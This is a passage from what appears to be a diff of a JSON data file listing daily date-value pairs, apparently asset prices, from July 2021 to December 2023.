"2021-07-19", + 29.25560188293457 + ], + [ + "2021-07-20", + 30.220279693603516 + ], + [ + "2021-07-21", + 30.910362243652344 + ], + [ + "2021-07-22", + 31.559852600097656 + ], + [ + "2021-07-23", + 32.60811233520508 + ], + [ + "2021-07-26", + 32.74422073364258 + ], + [ + "2021-07-27", + 31.67445945739746 + ], + [ + "2021-07-28", + 32.02069854736328 + ], + [ + "2021-07-29", + 32.17829513549805 + ], + [ + "2021-07-30", + 31.695960998535156 + ], + [ + "2021-08-02", + 31.6864070892334 + ], + [ + "2021-08-03", + 32.23799133300781 + ], + [ + "2021-08-04", + 32.39796829223633 + ], + [ + "2021-08-05", + 33.00687026977539 + ], + [ + "2021-08-06", + 32.577056884765625 + ], + [ + "2021-08-09", + 32.75137710571289 + ], + [ + "2021-08-10", + 32.261863708496094 + ], + [ + "2021-08-11", + 32.087554931640625 + ], + [ + "2021-08-12", + 32.42185592651367 + ], + [ + "2021-08-13", + 32.74660110473633 + ], + [ + "2021-08-16", + 32.80390167236328 + ], + [ + "2021-08-17", + 31.941905975341797 + ], + [ + "2021-08-18", + 31.013044357299805 + ], + [ + "2021-08-19", + 31.454792022705078 + ], + [ + "2021-08-20", + 32.42662811279297 + ], + [ + "2021-08-23", + 33.87126922607422 + ], + [ + "2021-08-24", + 34.205562591552734 + ], + [ + "2021-08-25", + 34.2437629699707 + ], + [ + "2021-08-26", + 33.66352462768555 + ], + [ + "2021-08-27", + 34.64730453491211 + ], + [ + "2021-08-30", + 35.79584884643555 + ], + [ + "2021-08-31", + 35.695556640625 + ], + [ + "2021-09-01", + 35.891357421875 + ], + [ + "2021-09-02", + 35.841224670410156 + ], + [ + "2021-09-03", + 36.16357421875 + ], + [ + "2021-09-07", + 36.311614990234375 + ], + [ + "2021-09-08", + 35.939125061035156 + ], + [ + "2021-09-09", + 35.5546760559082 + ], + [ + "2021-09-10", + 34.754756927490234 + ], + [ + "2021-09-13", + 34.67596435546875 + ], + [ + "2021-09-14", + 34.37747573852539 + ], + [ + "2021-09-15", + 35.139190673828125 + ], + [ + "2021-09-16", + 35.20845031738281 + ], + [ + "2021-09-17", + 33.964385986328125 + ], + [ + "2021-09-20", + 31.875049591064453 + ], + [ + "2021-09-21", + 31.915630340576172 + ], + [ + "2021-09-22", + 32.849273681640625 + ], + [ + "2021-09-23", + 33.761417388916016 + ], + [ + "2021-09-24", + 33.85693359375 + ], + [ + "2021-09-27", + 33.04030227661133 + ], + [ + "2021-09-28", + 30.28475570678711 + ], + [ + "2021-09-29", + 30.084177017211914 + ], + [ + "2021-09-30", + 29.74510383605957 + ], + [ + "2021-10-01", + 30.287139892578125 + ], + [ + "2021-10-04", + 28.424640655517578 + ], + [ + "2021-10-05", + 29.518260955810547 + ], + [ + "2021-10-06", + 30.100893020629883 + ], + [ + "2021-10-07", + 30.91514015197754 + ], + [ + "2021-10-08", + 30.439964294433594 + ], + [ + "2021-10-11", + 29.76420783996582 + ], + [ + "2021-10-12", + 29.460954666137695 + ], + [ + "2021-10-13", + 30.151033401489258 + ], + [ + "2021-10-14", + 31.815345764160156 + ], + [ + "2021-10-15", + 32.4051399230957 + ], + [ + "2021-10-18", + 33.376983642578125 + ], + [ + "2021-10-19", + 34.110050201416016 + ], + [ + "2021-10-20", + 34.002586364746094 + ], + [ + "2021-10-21", + 34.61148452758789 + ], + [ + "2021-10-22", + 33.73516082763672 + ], + [ + "2021-10-25", + 34.747589111328125 + ], + [ + "2021-10-26", + 35.07233810424805 + ], + [ + "2021-10-27", + 35.34932327270508 + ], + [ + "2021-10-28", + 36.50980758666992 + ], + [ + "2021-10-29", + 37.04945373535156 + ], + [ + "2021-11-01", + 37.414791107177734 + ], + [ + "2021-11-02", + 37.913848876953125 + ], + [ + "2021-11-03", + 39.117305755615234 + ], + [ + "2021-11-04", + 40.57626724243164 + ], + [ + "2021-11-05", + 40.7266960144043 + ], + [ + "2021-11-08", + 40.55955505371094 + ], + [ + "2021-11-09", + 39.72381591796875 + ], + [ + "2021-11-10", + 37.983097076416016 + ], + [ + "2021-11-11", + 38.291114807128906 + ], + [ + "2021-11-12", + 39.50652313232422 + ], + [ + "2021-11-15", + 39.49457931518555 + ], + [ + "2021-11-16", + 40.311222076416016 + ], + [ + "2021-11-17", + 40.35897445678711 + ], + [ + "2021-11-18", + 41.593482971191406 + ], + [ + "2021-11-19", + 42.29789733886719 + ], + [ + "2021-11-22", + 40.831764221191406 + ], + [ + "2021-11-23", + 40.27539825439453 + ], + [ + "2021-11-24", + 40.64789962768555 + ], + [ + "2021-11-26", + 38.40573501586914 + ], + [ + "2021-11-29", + 40.79117202758789 + ], + [ + "2021-11-30", + 39.03851318359375 + ], + [ + "2021-12-01", + 37.035125732421875 + ], + [ + "2021-12-02", + 37.73237228393555 + ], + [ + "2021-12-03", + 35.83644485473633 + ], + [ + "2021-12-06", + 36.674564361572266 + ], + [ + "2021-12-07", + 39.9817008972168 + ], + [ + "2021-12-08", + 40.538063049316406 + ], + [ + "2021-12-09", + 38.787784576416016 + ], + [ + "2021-12-10", + 39.988861083984375 + ], + [ + "2021-12-13", + 38.2696418762207 + ], + [ + "2021-12-14", + 37.130638122558594 + ], + [ + "2021-12-15", + 39.587703704833984 + ], + [ + "2021-12-16", + 36.567115783691406 + ], + [ + "2021-12-17", + 36.008365631103516 + ], + [ + "2021-12-20", + 34.93145751953125 + ], + [ + "2021-12-21", + 37.266746520996094 + ], + [ + "2021-12-22", + 38.596763610839844 + ], + [ + "2021-12-23", + 39.5136833190918 + ], + [ + "2021-12-27", + 41.40245819091797 + ], + [ + "2021-12-28", + 40.915340423583984 + ], + [ + "2021-12-29", + 40.850868225097656 + ], + [ + "2021-12-30", + 40.468814849853516 + ], + [ + "2021-12-31", + 39.716651916503906 + ], + [ + "2022-01-03", + 40.862815856933594 + ], + [ + "2022-01-04", + 39.27490234375 + ], + [ + "2022-01-05", + 35.662132263183594 + ], + [ + "2022-01-06", + 35.564231872558594 + ], + [ + "2022-01-07", + 34.40135955810547 + ], + [ + "2022-01-10", + 34.52790832519531 + ], + [ + "2022-01-11", + 36.04656219482422 + ], + [ + "2022-01-12", + 36.457279205322266 + ], + [ + "2022-01-13", + 33.81156921386719 + ], + [ + "2022-01-14", + 34.32255935668945 + ], + [ + "2022-01-18", + 31.84877586364746 + ], + [ + "2022-01-19", + 30.740827560424805 + ], + [ + "2022-01-20", + 29.551692962646484 + ], + [ + "2022-01-21", + 27.06357765197754 + ], + [ + "2022-01-24", + 27.455184936523438 + ], + [ + "2022-01-25", + 25.43031120300293 + ], + [ + "2022-01-26", + 25.382553100585938 + ], + [ + "2022-01-27", + 24.623226165771484 + ], + [ + "2022-01-28", + 26.920307159423828 + ], + [ + "2022-01-31", + 29.527812957763672 + ], + [ + "2022-02-01", + 30.091337203979492 + ], + [ + "2022-02-02", + 30.80290985107422 + ], + [ + "2022-02-03", + 27.09700584411621 + ], + [ + "2022-02-04", + 28.033035278320312 + ], + [ + "2022-02-07", + 27.397871017456055 + ], + [ + "2022-02-08", + 28.329120635986328 + ], + [ + "2022-02-09", + 30.086559295654297 + ], + [ + "2022-02-10", + 28.090341567993164 + ], + [ + "2022-02-11", + 25.44463348388672 + ], + [ + "2022-02-14", + 25.516267776489258 + ], + [ + "2022-02-15", + 27.364442825317383 + ], + [ + "2022-02-16", + 27.359668731689453 + ], + [ + "2022-02-17", + 24.93364143371582 + ], + [ + "2022-02-18", + 24.08835220336914 + ], + [ + "2022-02-22", + 23.343353271484375 + ], + [ + "2022-02-23", + 21.557260513305664 + ], + [ + "2022-02-24", + 23.6680965423584 + ], + [ + "2022-02-25", + 24.790374755859375 + ], + [ + "2022-02-28", + 25.05303382873535 + ], + [ + "2022-03-01", + 23.897327423095703 + ], + [ + "2022-03-02", + 25.03870391845703 + ], + [ + "2022-03-03", + 23.992839813232422 + ], + [ + "2022-03-04", + 22.966079711914062 + ], + [ + "2022-03-07", + 20.40155601501465 + ], + [ + "2022-03-08", + 20.119794845581055 + ], + [ + "2022-03-09", + 22.273611068725586 + ], + [ + "2022-03-10", + 21.557260513305664 + ], + [ + "2022-03-11", + 20.22007942199707 + ], + [ + "2022-03-14", + 19.035724639892578 + ], + [ + "2022-03-15", + 20.797929763793945 + ], + [ + "2022-03-16", + 23.133224487304688 + ], + [ + "2022-03-17", + 23.90688133239746 + ], + [ + "2022-03-18", + 25.392101287841797 + ], + [ + "2022-03-21", + 25.21063232421875 + ], + [ + "2022-03-22", + 26.70063018798828 + ], + [ + "2022-03-23", + 25.573577880859375 + ], + [ + "2022-03-24", + 27.230728149414062 + ], + [ + "2022-03-25", + 27.187747955322266 + ], + [ + "2022-03-28", + 28.424640655517578 + ], + [ + "2022-03-29", + 29.881210327148438 + ], + [ + "2022-03-30", + 28.98339080810547 + ], + [ + "2022-03-31", + 27.784700393676758 + ], + [ + "2022-04-01", + 27.66530990600586 + ], + [ + "2022-04-04", + 29.394092559814453 + ], + [ + "2022-04-05", + 27.450407028198242 + ], + [ + "2022-04-06", + 25.64521598815918 + ], + [ + "2022-04-07", + 25.81236457824707 + ], + [ + "2022-04-08", + 24.756940841674805 + ], + [ + "2022-04-11", + 22.99950408935547 + ], + [ + "2022-04-12", + 22.703414916992188 + ], + [ + "2022-04-13", + 24.06447410583496 + ], + [ + "2022-04-14", + 22.445533752441406 + ], + [ + "2022-04-18", + 22.507614135742188 + ], + [ + "2022-04-19", + 23.954633712768555 + ], + [ + "2022-04-20", + 22.875341415405273 + ], + [ + "2022-04-21", + 21.53338623046875 + ], + [ + "2022-04-22", + 19.823701858520508 + ], + [ + "2022-04-25", + 20.559154510498047 + ], + [ + "2022-04-26", + 18.247737884521484 + ], + [ + "2022-04-27", + 18.166549682617188 + ], + [ + "2022-04-28", + 20.086362838745117 + ], + [ + "2022-04-29", + 17.44542694091797 + ], + [ + "2022-05-02", + 18.266843795776367 + ], + [ + "2022-05-03", + 18.30982208251953 + ], + [ + "2022-05-04", + 20.12456512451172 + ], + [ + "2022-05-05", + 17.125457763671875 + ], + [ + "2022-05-06", + 16.528507232666016 + ], + [ + "2022-05-09", + 14.575267791748047 + ], + [ + "2022-05-10", + 15.07671070098877 + ], + [ + "2022-05-11", + 13.73475456237793 + ], + [ + "2022-05-12", + 13.624917030334473 + ], + [ + "2022-05-13", + 15.105364799499512 + ], + [ + "2022-05-16", + 14.637351036071777 + ], + [ + "2022-05-17", + 15.740527153015137 + ], + [ + "2022-05-18", + 13.443440437316895 + ], + [ + "2022-05-19", + 13.171229362487793 + ], + [ + "2022-05-20", + 13.056612014770508 + ], + [ + "2022-05-23", + 13.701324462890625 + ], + [ + "2022-05-24", + 12.846485137939453 + ], + [ + "2022-05-25", + 13.362252235412598 + ], + [ + "2022-05-26", + 14.479756355285645 + ], + [ + "2022-05-27", + 15.898124694824219 + ], + [ + "2022-05-31", + 15.783509254455566 + ], + [ + "2022-06-01", + 15.415780067443848 + ], + [ + "2022-06-02", + 16.667003631591797 + ], + [ + "2022-06-03", + 15.348922729492188 + ], + [ + "2022-06-06", + 15.539949417114258 + ], + [ + "2022-06-07", + 15.917224884033203 + ], + [ + "2022-06-08", + 15.59248161315918 + ], + [ + "2022-06-09", + 14.322158813476562 + ], + [ + "2022-06-10", + 12.793951988220215 + ], + [ + "2022-06-13", + 11.02219009399414 + ], + [ + "2022-06-14", + 11.09382438659668 + ], + [ + "2022-06-15", + 11.891355514526367 + ], + [ + "2022-06-16", + 10.439560890197754 + ], + [ + "2022-06-17", + 10.826384544372559 + ], + [ + "2022-06-21", + 11.643020629882812 + ], + [ + "2022-06-22", + 11.600043296813965 + ], + [ + "2022-06-23", + 12.096709251403809 + ], + [ + "2022-06-24", + 13.362252235412598 + ], + [ + "2022-06-27", + 13.047062873840332 + ], + [ + "2022-06-28", + 11.857924461364746 + ], + [ + "2022-06-29", + 11.881804466247559 + ], + [ + "2022-06-30", + 11.461548805236816 + ], + [ + "2022-07-01", + 11.647796630859375 + ], + [ + "2022-07-05", + 12.249527931213379 + ], + [ + "2022-07-06", + 12.483534812927246 + ], + [ + "2022-07-07", + 13.257190704345703 + ], + [ + "2022-07-08", + 13.3192720413208 + ], + [ + "2022-07-11", + 12.469209671020508 + ], + [ + "2022-07-12", + 12.106260299682617 + ], + [ + "2022-07-13", + 12.029850006103516 + ], + [ + "2022-07-14", + 12.15401554107666 + ], + [ + "2022-07-15", + 12.793951988220215 + ], + [ + "2022-07-18", + 12.497861862182617 + ], + [ + "2022-07-19", + 13.591484069824219 + ], + [ + "2022-07-20", + 14.27440357208252 + ], + [ + "2022-07-21", + 14.88090991973877 + ], + [ + "2022-07-22", + 14.102479934692383 + ], + [ + "2022-07-25", + 13.892350196838379 + ], + [ + "2022-07-26", + 13.051836967468262 + ], + [ + "2022-07-27", + 14.680333137512207 + ], + [ + "2022-07-28", + 15.100590705871582 + ], + [ + "2022-07-29", + 15.931553840637207 + ], + [ + "2022-08-01", + 15.907672882080078 + ], + [ + "2022-08-02", + 15.759629249572754 + ], + [ + "2022-08-03", + 17.020397186279297 + ], + [ + "2022-08-04", + 17.263954162597656 + ], + [ + "2022-08-05", + 16.85325050354004 + ], + [ + "2022-08-08", + 16.68132972717285 + ], + [ + "2022-08-09", + 16.108245849609375 + ], + [ + "2022-08-10", + 17.43110466003418 + ], + [ + "2022-08-11", + 17.168445587158203 + ], + [ + "2022-08-12", + 18.137897491455078 + ], + [ + "2022-08-15", + 18.572481155395508 + ], + [ + "2022-08-16", + 18.45309066772461 + ], + [ + "2022-08-17", + 17.813152313232422 + ], + [ + "2022-08-18", + 17.932546615600586 + ], + [ + "2022-08-19", + 16.88190269470215 + ], + [ + "2022-08-22", + 15.554277420043945 + ], + [ + "2022-08-23", + 15.501744270324707 + ], + [ + "2022-08-24", + 15.621135711669922 + ], + [ + "2022-08-25", + 16.442546844482422 + ], + [ + "2022-08-26", + 14.441550254821777 + ], + [ + "2022-08-29", + 13.99741268157959 + ], + [ + "2022-08-30", + 13.529401779174805 + ], + [ + "2022-08-31", + 13.2810697555542 + ], + [ + "2022-09-01", + 13.295394897460938 + ], + [ + "2022-09-02", + 12.741419792175293 + ], + [ + "2022-09-06", + 12.450104713439941 + ], + [ + "2022-09-07", + 13.18555736541748 + ], + [ + "2022-09-08", + 13.400458335876465 + ], + [ + "2022-09-09", + 14.25052547454834 + ], + [ + "2022-09-12", + 14.771071434020996 + ], + [ + "2022-09-13", + 12.340266227722168 + ], + [ + "2022-09-14", + 12.617254257202148 + ], + [ + "2022-09-15", + 11.982091903686523 + ], + [ + "2022-09-16", + 11.748085975646973 + ], + [ + "2022-09-19", + 12.029850006103516 + ], + [ + "2022-09-20", + 11.74331283569336 + ], + [ + "2022-09-21", + 11.09859848022461 + ], + [ + "2022-09-22", + 10.68789291381836 + ], + [ + "2022-09-23", + 10.176898002624512 + ], + [ + "2022-09-26", + 10.038407325744629 + ], + [ + "2022-09-27", + 10.047958374023438 + ], + [ + "2022-09-28", + 10.635360717773438 + ], + [ + "2022-09-29", + 9.737539291381836 + ], + [ + "2022-09-30", + 9.226545333862305 + ], + [ + "2022-10-03", + 9.866482734680176 + ], + [ + "2022-10-04", + 10.783406257629395 + ], + [ + "2022-10-05", + 10.783406257629395 + ], + [ + "2022-10-06", + 10.511194229125977 + ], + [ + "2022-10-07", + 9.312505722045898 + ], + [ + "2022-10-10", + 9.021193504333496 + ], + [ + "2022-10-11", + 8.663020133972168 + ], + [ + "2022-10-12", + 8.64391803741455 + ], + [ + "2022-10-13", + 9.221770286560059 + ], + [ + "2022-10-14", + 8.39080810546875 + ], + [ + "2022-10-17", + 9.21699333190918 + ], + [ + "2022-10-18", + 9.44622802734375 + ], + [ + "2022-10-19", + 9.331609725952148 + ], + [ + "2022-10-20", + 9.1740140914917 + ], + [ + "2022-10-21", + 9.823502540588379 + ], + [ + "2022-10-24", + 10.157796859741211 + ], + [ + "2022-10-25", + 10.76908016204834 + ], + [ + "2022-10-26", + 10.05750846862793 + ], + [ + "2022-10-27", + 9.503531455993652 + ], + [ + "2022-10-28", + 10.363150596618652 + ], + [ + "2022-10-31", + 10.004976272583008 + ], + [ + "2022-11-01", + 9.694561004638672 + ], + [ + "2022-11-02", + 8.691675186157227 + ], + [ + "2022-11-03", + 8.190231323242188 + ], + [ + "2022-11-04", + 8.572281837463379 + ], + [ + "2022-11-07", + 8.84449577331543 + ], + [ + "2022-11-08", + 9.03551959991455 + ], + [ + "2022-11-09", + 8.405135154724121 + ], + [ + "2022-11-10", + 10.243757247924805 + ], + [ + "2022-11-11", + 10.826384544372559 + ], + [ + "2022-11-14", + 10.539847373962402 + ], + [ + "2022-11-15", + 10.964879989624023 + ], + [ + "2022-11-16", + 10.520746231079102 + ], + [ + "2022-11-17", + 10.439560890197754 + ], + [ + "2022-11-18", + 10.430008888244629 + ], + [ + "2022-11-21", + 10.114814758300781 + ], + [ + "2022-11-22", + 10.539847373962402 + ], + [ + "2022-11-23", + 10.855043411254883 + ], + [ + "2022-11-25", + 10.630587577819824 + ], + [ + "2022-11-28", + 10.16257095336914 + ], + [ + "2022-11-29", + 9.919014930725098 + ], + [ + "2022-11-30", + 11.251418113708496 + ], + [ + "2022-12-01", + 11.31350326538086 + ], + [ + "2022-12-02", + 11.17978572845459 + ], + [ + "2022-12-05", + 10.616260528564453 + ], + [ + "2022-12-06", + 9.942892074584961 + ], + [ + "2022-12-07", + 9.823502540588379 + ], + [ + "2022-12-08", + 10.172123908996582 + ], + [ + "2022-12-09", + 9.976322174072266 + ], + [ + "2022-12-12", + 10.339269638061523 + ], + [ + "2022-12-13", + 10.664016723632812 + ], + [ + "2022-12-14", + 10.410904884338379 + ], + [ + "2022-12-15", + 9.379364967346191 + ], + [ + "2022-12-16", + 9.102380752563477 + ], + [ + "2022-12-19", + 8.725103378295898 + ], + [ + "2022-12-20", + 8.686897277832031 + ], + [ + "2022-12-21", + 9.064173698425293 + ], + [ + "2022-12-22", + 8.419958114624023 + ], + [ + "2022-12-23", + 8.443960189819336 + ], + [ + "2022-12-27", + 8.083925247192383 + ], + [ + "2022-12-28", + 7.7574968338012695 + ], + [ + "2022-12-29", + 8.3047456741333 + ], + [ + "2022-12-30", + 8.3047456741333 + ], + [ + "2023-01-03", + 8.117527961730957 + ], + [ + "2023-01-04", + 8.242341041564941 + ], + [ + "2023-01-05", + 7.853504657745361 + ], + [ + "2023-01-06", + 8.467960357666016 + ], + [ + "2023-01-09", + 8.645577430725098 + ], + [ + "2023-01-10", + 8.875999450683594 + ], + [ + "2023-01-11", + 9.317636489868164 + ], + [ + "2023-01-12", + 9.461647987365723 + ], + [ + "2023-01-13", + 9.648868560791016 + ], + [ + "2023-01-17", + 9.70167064666748 + ], + [ + "2023-01-18", + 9.341638565063477 + ], + [ + "2023-01-19", + 9.048813819885254 + ], + [ + "2023-01-20", + 9.788078308105469 + ], + [ + "2023-01-23", + 10.43133544921875 + ], + [ + "2023-01-24", + 10.36893081665039 + ], + [ + "2023-01-25", + 10.29212474822998 + ], + [ + "2023-01-26", + 10.887377738952637 + ], + [ + "2023-01-27", + 11.199405670166016 + ], + [ + "2023-01-30", + 10.527344703674316 + ], + [ + "2023-01-31", + 10.997788429260254 + ], + [ + "2023-02-01", + 11.708251953125 + ], + [ + "2023-02-02", + 12.91795825958252 + ], + [ + "2023-02-03", + 12.250700950622559 + ], + [ + "2023-02-06", + 11.938671112060547 + ], + [ + "2023-02-07", + 12.677938461303711 + ], + [ + "2023-02-08", + 11.996277809143066 + ], + [ + "2023-02-09", + 11.674649238586426 + ], + [ + "2023-02-10", + 11.434627532958984 + ], + [ + "2023-02-13", + 11.97707748413086 + ], + [ + "2023-02-14", + 12.236299514770508 + ], + [ + "2023-02-15", + 12.509922981262207 + ], + [ + "2023-02-16", + 11.794658660888672 + ], + [ + "2023-02-17", + 11.540237426757812 + ], + [ + "2023-02-21", + 10.728962898254395 + ], + [ + "2023-02-22", + 10.738566398620605 + ], + [ + "2023-02-23", + 11.0073881149292 + ], + [ + "2023-02-24", + 10.450539588928223 + ], + [ + "2023-02-27", + 10.676156997680664 + ], + [ + "2023-02-28", + 10.623353958129883 + ], + [ + "2023-03-01", + 10.364130973815918 + ], + [ + "2023-03-02", + 10.613754272460938 + ], + [ + "2023-03-03", + 11.261810302734375 + ], + [ + "2023-03-06", + 11.309815406799316 + ], + [ + "2023-03-07", + 10.887377738952637 + ], + [ + "2023-03-08", + 11.0361909866333 + ], + [ + "2023-03-09", + 10.455339431762695 + ], + [ + "2023-03-10", + 10.023299217224121 + ], + [ + "2023-03-13", + 10.23931884765625 + ], + [ + "2023-03-14", + 10.935380935668945 + ], + [ + "2023-03-15", + 11.09379768371582 + ], + [ + "2023-03-16", + 11.972274780273438 + ], + [ + "2023-03-17", + 11.794658660888672 + ], + [ + "2023-03-20", + 11.919469833374023 + ], + [ + "2023-03-21", + 12.423515319824219 + ], + [ + "2023-03-22", + 11.916531562805176 + ], + [ + "2023-03-23", + 12.34143352508545 + ], + [ + "2023-03-24", + 12.466970443725586 + ], + [ + "2023-03-27", + 12.211066246032715 + ], + [ + "2023-03-28", + 12.008270263671875 + ], + [ + "2023-03-29", + 12.664935111999512 + ], + [ + "2023-03-30", + 13.007752418518066 + ], + [ + "2023-03-31", + 13.645103454589844 + ], + [ + "2023-04-03", + 13.54853630065918 + ], + [ + "2023-04-04", + 13.413341522216797 + ], + [ + "2023-04-05", + 12.983611106872559 + ], + [ + "2023-04-06", + 13.244346618652344 + ], + [ + "2023-04-10", + 13.215376853942871 + ], + [ + "2023-04-11", + 12.959467887878418 + ], + [ + "2023-04-12", + 12.616652488708496 + ], + [ + "2023-04-13", + 13.340914726257324 + ], + [ + "2023-04-14", + 13.263659477233887 + ], + [ + "2023-04-17", + 13.278143882751465 + ], + [ + "2023-04-18", + 13.287802696228027 + ], + [ + "2023-04-19", + 13.258830070495605 + ], + [ + "2023-04-20", + 12.949812889099121 + ], + [ + "2023-04-21", + 12.973956108093262 + ], + [ + "2023-04-24", + 12.896700859069824 + ], + [ + "2023-04-25", + 12.167610168457031 + ], + [ + "2023-04-26", + 12.370403289794922 + ], + [ + "2023-04-27", + 13.369884490966797 + ], + [ + "2023-04-28", + 13.640275955200195 + ], + [ + "2023-05-01", + 13.601648330688477 + ], + [ + "2023-05-02", + 13.239518165588379 + ], + [ + "2023-05-03", + 12.978781700134277 + ], + [ + "2023-05-04", + 12.833930969238281 + ], + [ + "2023-05-05", + 13.62096118927002 + ], + [ + "2023-05-08", + 13.732016563415527 + ], + [ + "2023-05-09", + 13.466455459594727 + ], + [ + "2023-05-10", + 13.901010513305664 + ], + [ + "2023-05-11", + 14.01689338684082 + ], + [ + "2023-05-12", + 13.872042655944824 + ], + [ + "2023-05-15", + 14.084491729736328 + ], + [ + "2023-05-16", + 14.137603759765625 + ], + [ + "2023-05-17", + 14.644586563110352 + ], + [ + "2023-05-18", + 15.431618690490723 + ], + [ + "2023-05-19", + 15.32539176940918 + ], + [ + "2023-05-22", + 15.484731674194336 + ], + [ + "2023-05-23", + 14.886006355285645 + ], + [ + "2023-05-24", + 14.644586563110352 + ], + [ + "2023-05-25", + 15.702011108398438 + ], + [ + "2023-05-26", + 16.889801025390625 + ], + [ + "2023-05-30", + 17.12639617919922 + ], + [ + "2023-05-31", + 16.77874755859375 + ], + [ + "2023-06-01", + 17.38712501525879 + ], + [ + "2023-06-02", + 17.778228759765625 + ], + [ + "2023-06-05", + 17.816852569580078 + ], + [ + "2023-06-06", + 17.79754638671875 + ], + [ + "2023-06-07", + 16.889801025390625 + ], + [ + "2023-06-08", + 17.46921157836914 + ], + [ + "2023-06-09", + 17.681659698486328 + ], + [ + "2023-06-12", + 18.58457374572754 + ], + [ + "2023-06-13", + 18.99982261657715 + ], + [ + "2023-06-14", + 19.40540313720703 + ], + [ + "2023-06-15", + 20.086214065551758 + ], + [ + "2023-06-16", + 19.699935913085938 + ], + [ + "2023-06-20", + 19.603368759155273 + ], + [ + "2023-06-21", + 18.817724227905273 + ], + [ + "2023-06-22", + 19.44256019592285 + ], + [ + "2023-06-23", + 18.86616325378418 + ], + [ + "2023-06-26", + 18.12023162841797 + ], + [ + "2023-06-27", + 19.01631736755371 + ], + [ + "2023-06-28", + 19.132564544677734 + ], + [ + "2023-06-29", + 19.001787185668945 + ], + [ + "2023-06-30", + 19.85911750793457 + ], + [ + "2023-07-03", + 19.994741439819336 + ], + [ + "2023-07-05", + 19.980213165283203 + ], + [ + "2023-07-06", + 19.510372161865234 + ], + [ + "2023-07-07", + 19.31178092956543 + ], + [ + "2023-07-10", + 19.326311111450195 + ], + [ + "2023-07-11", + 19.60240364074707 + ], + [ + "2023-07-12", + 20.328954696655273 + ], + [ + "2023-07-13", + 21.341285705566406 + ], + [ + "2023-07-14", + 21.321910858154297 + ], + [ + "2023-07-17", + 21.912839889526367 + ], + [ + "2023-07-18", + 22.435958862304688 + ], + [ + "2023-07-19", + 22.435958862304688 + ], + [ + "2023-07-20", + 20.86176109313965 + ], + [ + "2023-07-21", + 20.677701950073242 + ], + [ + "2023-07-24", + 20.760040283203125 + ], + [ + "2023-07-25", + 21.176603317260742 + ], + [ + "2023-07-26", + 20.958633422851562 + ], + [ + "2023-07-27", + 20.779420852661133 + ], + [ + "2023-07-28", + 21.903154373168945 + ], + [ + "2023-07-31", + 21.946744918823242 + ], + [ + "2023-08-01", + 21.777217864990234 + ], + [ + "2023-08-02", + 20.353174209594727 + ], + [ + "2023-08-03", + 20.207862854003906 + ], + [ + "2023-08-04", + 19.926929473876953 + ], + [ + "2023-08-07", + 20.420982360839844 + ], + [ + "2023-08-08", + 19.89786720275879 + ], + [ + "2023-08-09", + 19.234285354614258 + ], + [ + "2023-08-10", + 19.321470260620117 + ], + [ + "2023-08-11", + 18.93397331237793 + ], + [ + "2023-08-14", + 19.56365203857422 + ], + [ + "2023-08-15", + 18.96303367614746 + ], + [ + "2023-08-16", + 18.333354949951172 + ], + [ + "2023-08-17", + 17.71336555480957 + ], + [ + "2023-08-18", + 17.63102149963379 + ], + [ + "2023-08-21", + 18.483509063720703 + ], + [ + "2023-08-22", + 18.401166915893555 + ], + [ + "2023-08-23", + 19.2681827545166 + ], + [ + "2023-08-24", + 17.9991397857666 + ], + [ + "2023-08-25", + 18.42538833618164 + ], + [ + "2023-08-28", + 18.837099075317383 + ], + [ + "2023-08-29", + 20.038333892822266 + ], + [ + "2023-08-30", + 20.372547149658203 + ], + [ + "2023-08-31", + 20.556608200073242 + ], + [ + "2023-09-01", + 20.48395347595215 + ], + [ + "2023-09-05", + 20.537235260009766 + ], + [ + "2023-09-06", + 19.994741439819336 + ], + [ + "2023-09-07", + 19.558809280395508 + ], + [ + "2023-09-08", + 19.616933822631836 + ], + [ + "2023-09-11", + 20.285364151000977 + ], + [ + "2023-09-12", + 19.636308670043945 + ], + [ + "2023-09-13", + 19.83005714416504 + ], + [ + "2023-09-14", + 20.2950496673584 + ], + [ + "2023-09-15", + 19.2536563873291 + ], + [ + "2023-09-18", + 19.297252655029297 + ], + [ + "2023-09-19", + 19.180999755859375 + ], + [ + "2023-09-20", + 18.349327087402344 + ], + [ + "2023-09-21", + 17.30426597595215 + ], + [ + "2023-09-22", + 17.3188533782959 + ], + [ + "2023-09-25", + 17.547304153442383 + ], + [ + "2023-09-26", + 16.76472282409668 + ], + [ + "2023-09-27", + 16.866798400878906 + ], + [ + "2023-09-28", + 17.275100708007812 + ], + [ + "2023-09-29", + 17.31398582458496 + ], + [ + "2023-10-02", + 17.72715187072754 + ], + [ + "2023-10-03", + 16.789024353027344 + ], + [ + "2023-10-04", + 17.469532012939453 + ], + [ + "2023-10-05", + 17.284826278686523 + ], + [ + "2023-10-06", + 18.154897689819336 + ], + [ + "2023-10-09", + 18.4222412109375 + ], + [ + "2023-10-10", + 18.72360610961914 + ], + [ + "2023-10-11", + 19.12218475341797 + ], + [ + "2023-10-12", + 18.89859390258789 + ], + [ + "2023-10-13", + 18.184062957763672 + ], + [ + "2023-10-16", + 18.79651641845703 + ], + [ + "2023-10-17", + 18.616666793823242 + ], + [ + "2023-10-18", + 17.829227447509766 + ], + [ + "2023-10-19", + 17.35287094116211 + ], + [ + "2023-10-20", + 16.570295333862305 + ], + [ + "2023-10-23", + 16.716114044189453 + ], + [ + "2023-10-24", + 17.187610626220703 + ], + [ + "2023-10-25", + 15.928671836853027 + ], + [ + "2023-10-26", + 15.000271797180176 + ], + [ + "2023-10-27", + 15.214142799377441 + ], + [ + "2023-10-30", + 15.705080032348633 + ], + [ + "2023-10-31", + 15.933536529541016 + ], + [ + "2023-11-01", + 16.7550048828125 + ], + [ + "2023-11-02", + 17.644519805908203 + ], + [ + "2023-11-03", + 18.26669692993164 + ], + [ + "2023-11-06", + 18.475704193115234 + ], + [ + "2023-11-07", + 18.99580955505371 + ], + [ + "2023-11-08", + 19.029836654663086 + ], + [ + "2023-11-09", + 18.577781677246094 + ], + [ + "2023-11-10", + 19.817276000976562 + ], + [ + "2023-11-13", + 19.637426376342773 + ], + [ + "2023-11-14", + 20.872055053710938 + ], + [ + "2023-11-15", + 20.930387496948242 + ], + [ + "2023-11-16", + 20.964412689208984 + ], + [ + "2023-11-17", + 20.97899055480957 + ], + [ + "2023-11-20", + 21.72754669189453 + ], + [ + "2023-11-21", + 21.33382797241211 + ], + [ + "2023-11-22", + 21.581727981567383 + ], + [ + "2023-11-24", + 21.474790573120117 + ], + [ + "2023-11-27", + 21.411598205566406 + ], + [ + "2023-11-28", + 21.581727981567383 + ], + [ + "2023-11-29", + 21.50395393371582 + ], + [ + "2023-11-30", + 21.32410430908203 + ], + [ + "2023-12-01", + 21.50395393371582 + ], + [ + "2023-12-04", + 20.89150047302246 + ], + [ + 